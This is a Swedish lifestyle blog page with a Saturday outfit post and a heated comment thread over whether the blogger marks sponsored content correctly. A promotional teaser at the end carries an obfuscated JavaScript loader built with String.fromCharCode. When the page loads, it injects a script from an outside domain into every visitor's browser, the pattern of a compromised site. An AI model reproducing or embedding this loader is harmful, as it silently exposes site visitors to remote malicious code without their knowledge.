Godmorgon underbara Lördag

// R E K L A M // 

DSC_3421

G O D M O R G O N!

Hoppas att du har sovit gott. Jag har sovit som en prinsessa <3

Vaknade utan att klockan ringde, och kände mig utvilad. Första gången på länge. BÄSTA känslan! 

 Lördag, inga möten, inga kunder. Bara en skön vi-gör-vad-vi-vill dag.  Lilleman och jag. En playdate inbokad för Ludvig, med en av sina bästisar, Max.

 Jag har en to-do-list. Men utan måsten. 

DSC_3420 DSC_3425 DSC_3430 DSC_3434 DSC_3437 DSC_3438 DSC_3439

O U T F I T

Dress Love Forever Skor Mou Boots KNOX Sigtuna. Foto Hannah Karlberg

Kramis <3 

65 Komentarer

 1. Du fattar verkligen inte det där med reklammarkering va…? Även i detta inlägg blev det fel och i dina två Instagramposter idag väljer att inte reklammarkera alls!!! Hur dum får man bli egentligen?

  • Instagramen är inget samarbete… Så där har jag inte gjort fel. Jag har köpt och betalat för skorna. Det finns inget avtal, inget kontrakt eller samarbete inblandat ? trevlig helg!

     • Så sorgligt My. Att du VERKLIGEN inte fattar. Jaja… nu är du tydligen anmäld igen till RO. Verkar som att man måste gå ”den hårda vägen” med en sådan ansvarslös person som du. Trevlig helg på dig med!

     • http://www.monasuniversum.se/det-har-med-reklam-i-bloggar-las-och-lar/ Lilla gumman.. Lägger in en länk till Mona här. läs på. Läs igen. Kanske t.o.m igen.Gå sedan in på ROs hemsida och läs ytterligare en gång. OM du då fortfarande känner dig osäker, förvirrad eller har några frågor. Ring till deras kundtjänst som öppnar på måndag igen. Bifoga mitt inlägg och red tillsamman med dom ut dina frågor kring mig, mitt inlägg och dina frågor…. Sen är du varmt välkommen tillbaka här inne för att be om ursäkt, både för dina attityd och otroligt otrevliga sätt att tilltala mig. Precis som jag gjorde, gör om och gör rätt ? -Deal?

     • My, det var sannerligen en hård och nedlåtande ton från dig. Med tanke på att du inte alltid haft koll på hur reklamsamarbeten ska märkas så kanske det inte är så konstigt att folk kommenterar och försöker rätta? Du har inte funderat på att du i längden skulle vinna på en lite ödmjukare attityd och kanske ett litet tack ibland?

     • Jag har artigt men bestämt svarat både första, andra och TREJE gången =) Vad mer kan jag göra…. Jag har rätt i det jag skriver. Jag förklarar vart ”hen” kan få tag i konkret fakta hos självaste RO för att styrka mina ord. Ändå är det JAG som får på fingrarna för en nedlåtande ton? Ett litet tack för vaddå? Fäöl att ”hen” kallar mig ”förlorare” ”blåögd” ect. Jag kallar inte någon för någonting. jag hänvisar till fakta kring de påståenden som ”hen” ifrågasätter =)

    • Oj oj oj Sara vilken glad och frisk fläkt du är så här på lördagen! Man blir så glad och positiv av att läsa din kommentar. Med den har du idag spridit värme och kärlek till dina medmänniskor. Du har gjort världen till en trevligare plats att leva i. Känn dig nöjd över dig själv! Själv är jag väldigt ironisk idag och struntar fullständigt i om bloggare markerar reklam eller inte. Den kollen lämnar jag till dem som förfasar sig över ensamma katter, barn som inte har säkerhetsbälte i matstolen och som påpekar om alla möjliga fel som deras medmänniskor kan råka göra. Vilken himla tur för oss misslyckade oansvariga slarvmajor att det finns så många perfekta felfria damer som kan ta oss i örat! Eller hur! Ha en fin lördag My och ps: Ludvig blev jättefin i nya frisyren! Kram!

     • Haha! Gud vad roligt du skriver =) Älskar din humor! =) Tack snälla du.. Det ska jag hälsa honom, då blir han JÄTTE mallig/glad/stolt. Kram

     • Ja du ”lilla gumman” My… Än en gång kommer du att fällas av RO. Så bra att det finns instanser som avgör dessa frågor. Bara detta att du hänvisar till Monas Universum (som om hon visste) visar hur blåögd du är. Time will tell. Och vet du… du är förloraren. För det är du som är företagaren som gång på gång på gång på gång begår grova misstag i din verksamhet. Lycka till!!!

     • jag hänvisar ÄVEN till deras hemsida där DU och alla andra kan läsa innantill. Ta nu din bitterhet och förvalta den till något positivt istället =) Känns så sorgset på något vis, att det enda du kan är att ”hytta med pekpinnen” morra, fräsa och spotta av frustration… =) Kom on, girl! Gör något snällt, glatt och positivt! =)

    • Du Sara…skaffa ett liv. Men förmodligen är du ett troll, springare till en ytterst otäck sajt som jag inte ens vill namnge för den ska ingen ”reklam” ha. Vad ger det dig att skriva som du gör? Känner du dig ”solskensnöjd” av att trycka till?
     My, ha en go söndag med lilleman

  • Och vem är du Sara ? Har du inget annat att göra än att sitta o leta fel o brister ? För att citera dig själv ’hur dum får man bli ’ ?
   My – ha en fin helg ? Hur mår Sture idag ?

 2. Jag känner såhär: HUR dum får man bli om det enda man tycks kunna roa sig med är att leta fel hos andra hela tiden?? Psykopatiska drag? Trist liv??
  Ha en skön helg My, Lilleman o kissarna?

 3. Jag vill bara skicka en stor varm kram till dig My! Jag mår riktigt illa över och läsa hur du blir behandlad, kränkningar och mobbing som fullständigt går överstyr. Det är fullkomligt oacceptabelt, jag skäms över att vuxna människor beter sig så.
  Ingen, verkligen ingen människa ska utsätta någon på det här sättet, har man ingen empati i kroppen kan man undra?
  Håll huvudet högt My och kämpa på!

  • ja… det är verkligen sorgligt. Det mest underhållande just nu är att det visast sig vara en väldigt lutel ”klick” av människor som använder sig av OLIKA namn för att få det att se värre ut än vad det är. Andra bloggare som ”gömmer sig” bakom anonyma namn… Nästan lite skrattretande faktiskt… men nu skiter vi i det, och fokuserar på bra åker istället! TACK för omtanken, den värmer <3 Stor kram

 4. Du är så fin My. Dessa forumspoliser önskar jag all världens väg. Hur kan man ha en sådan sjukdom att man kollar runt på andras bloggar för att se om dom kan hitta något att anmäla. Jag undrar verkligen vad dessa människor varit med om som gör dom så avundsjuka, bittra och elaka.

 5. Bra inställning My. Avunden verkar vara stor hos denna missnöjda person. . Det är klart det är samma person, det ser man på texten. Håll huvudet högt o var glad över att du är så populär som bloggare, vi är många, många som läser o följer dig.

 6. Du ” Sara ” måste ha ett riktigt tråkigt tragiskt innehållslöst liv som utnämner dig själv, till någon sorts mästare på reklam ?Vem har ens bett om din åsikt ? Gillar du inte bloggen gå här ifrån…. och du undrar ” hur dum får man bli”…. jösses! Tack för en inspererande blogg My ??

   • Känns som mobbing nu ;en läsare försvarar My och du My flikar in och tackar henne öppet. Varför My? Kan det inte bara rinna av dig? Om du vet att du har rätt i sakfrågan ignorera bara. och Att säga att andra bloggare är här med andra alias namn och kritiserar dig?! Har du vattentäta belägg för det?

    • Varför skulle jag inte kunna tacka? När någon förvarar mig när jag blir kallad fula saker och påstås bryta mot lagen… Då tycker jag att det hör till god ton att säga Tack ?

     • Stopp och belägg! Lägg inte orden i munnen på mig är du snäll… Jag tackar henne för att hon uppmuntrats mig att ignorera ”drevet” mot mig och fokusera på annat, Rent generellt… ? DET tackar jag henne innerligt för <3

     • ” Hat föder hat” precis som du brukar säga. Sorgligt att det äger rum här av bloggägaren själv tillsammans med läsare som håller med . Det är så som jag ser det. Detta är ju trots allt din blogg och du styr den. Och bara för att jag inte håller med betyder det inte att jag ogillar dig.

     • Håller med?. nej, Sandra nu tycker v i olika du och jag. Hur man skriver till mig? Vad man kallar mig mig för?
      DET är snarare vad jag med fler reagerar på.DET är vad läsare väljer att gå in och försvara.
      Inte för att man tycker olika… Att jag sedan tackar för fina ord, omtanke, pepp och stöd i DET som jag utsätts för.(det varierar ju såklart från situation till situation) Det min vän, det är inget näthat.
      Jag har dessvärre fått uppleva riktigt nästhat. Mycket mer än vad du som läsare kan se.
      DET är någonting jag ställer mig emot och personligen försöker att få ett stopp på, generellt. INTE bara mot mig.
      Men om man som vuxen kvinna/man går in och medvetet skriver halvtaskiga eller riktigt elaka kommentarer DÅ får man också vara beredd på att få ta konsekvenserna på det. Skriver man att jag tex är ”du i huvudet” då kommer andra läsare att tycka till. Om man istället hade omformulerat sig och utryckts sig på ett vuxet, verbalt sätt och istället hållt sig till frågan eller det man nu irriterar sig på. DÅ hade det blivit helt andra reaktioner. Jag ”styr” inte bloggen till 100%. jag har ett filter på kommentarsfältet där viss ord/namn inte går igenom, reklam och länkar går oftast direkt till skräpposten, Förutom det så har jag kommentarer för granskning. Beroende på vart jag är och vad jag gör så är det jag som släpper igenom. OM jag är ute på vift och behöver backup, så är det tre personer till som släpper igenom. Vi sållar bort otroligt mycket skit! Då menar jag på en helt annan nivå än det du läser om just nu. Man kan se att det är några få personer som sprider detta negativa och elaka här inne. Några få personer som utger sig för att vara många olika personer. Att man som läsare går och tycker till gällande kommentarer som är personangrepp mot mig. Genom att skriva att det är tex, ”tragiskt, sorgligt, eller dyl” När någon gjort ett kraftigt övertramp. Oftast flera gånger dessutom. DET tycker jag är helt okay… Det är lindrigt, om man jämför.

 7. Jag är allvarligt talad helt förundrad över hur genuint elaka tanter det finns där ute. Jag hoppas för guds skull att ni inte har barn som ni för över all denna ondska till. Just DU där bakom skärmen som sitter och hatar My för att det är typ ”trendigt” just nu – hur perfekt DU måste vara – hur himla perfekt DU måste vara, eller?
  Jag tycker för övrigt att det är trams det där med reklammärkning. Ingen här är småbarn längre – vi kan själva avgöra vad vi vill köpa eller inte. Blir just du (nämner random hatare) ”Sara”, helt köpgalen på Mys stövlar här och bara får en helt onaturlig drift av att gå ut och köpa dom? I så fall – sök hjälp! Om inte – logga ut från Internet för all evighet för din elakhet blir ingen glad av. Ta din energi och lägg på t.ex. Trump eller något annat populärt just nu!
  Till saken hör ju också att My hade köpt dessa stövlar själv utan spons. Får man inte som bloggare lägga ut bilder på saker som man inte har spons på enligt er hyenor? Får ni verkligen sån blodvittring av det? Tycker ni verkligen att vi har råd att reda ut era trötta anmälningar som ni gör bara för att ni känner för att anmäla någon?
  Barn skjuts i Sverige, det brinner i bilar och folk rånas på stan på blanka dan. Ska vi som land då ägna tid åt att tramsa med jönsar som er? Ni borde skämmas och rannsaka er själva.
  Själv kan jag ibland skämmas över att jag överhuvudtaget lägger tid på bloggar och inte på att sätta mig mer in i svåra världsproblem, hjälpa utsatta, läsa god litteratur, lyssna på P1 etc…men dom flesta behöver både och. Det är dock inte så många av oss som har en inbyggd ONDSKA som många har här.
  Lyssna inte på idioterna My! Du är bra som du är och det kommer att gå bra med allt.

 8. Ja så tråkigt med alla dessa omogna kommentarer. Ren och skär avundsjuka.Fortsätt som du gör My. Du gör ett grymt bra jobb med en inspirerande blogg som framförallt är äkta,något som jag verkligen uppskattar. Sänder en stor varm kram till dig.

 9. Hej My!
  Fasen va snygga byxor, va in o kikade på sidan du länkade till men hittar inte byxorna..snälla länka till dem så är du snäll.
  Önskar dig o din pojk en härlig helg/Med vänlig hälsning Renèe

 10. Jag tycker du har en mysig och härlig blogg!
  Blir glad av den:)
  Ja, förutom att jag blir illa berörd hur du behandlas ibland:(
  Men det känns som ditt ljus lyser igenom på något sätt!
  En potatisgratäng står i ugnen och sprider härlig doft. Härliga fladdrande enjoy candles står i en vrå. En bra film och en mysig filt och lördagsmyset infinner sig här också.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/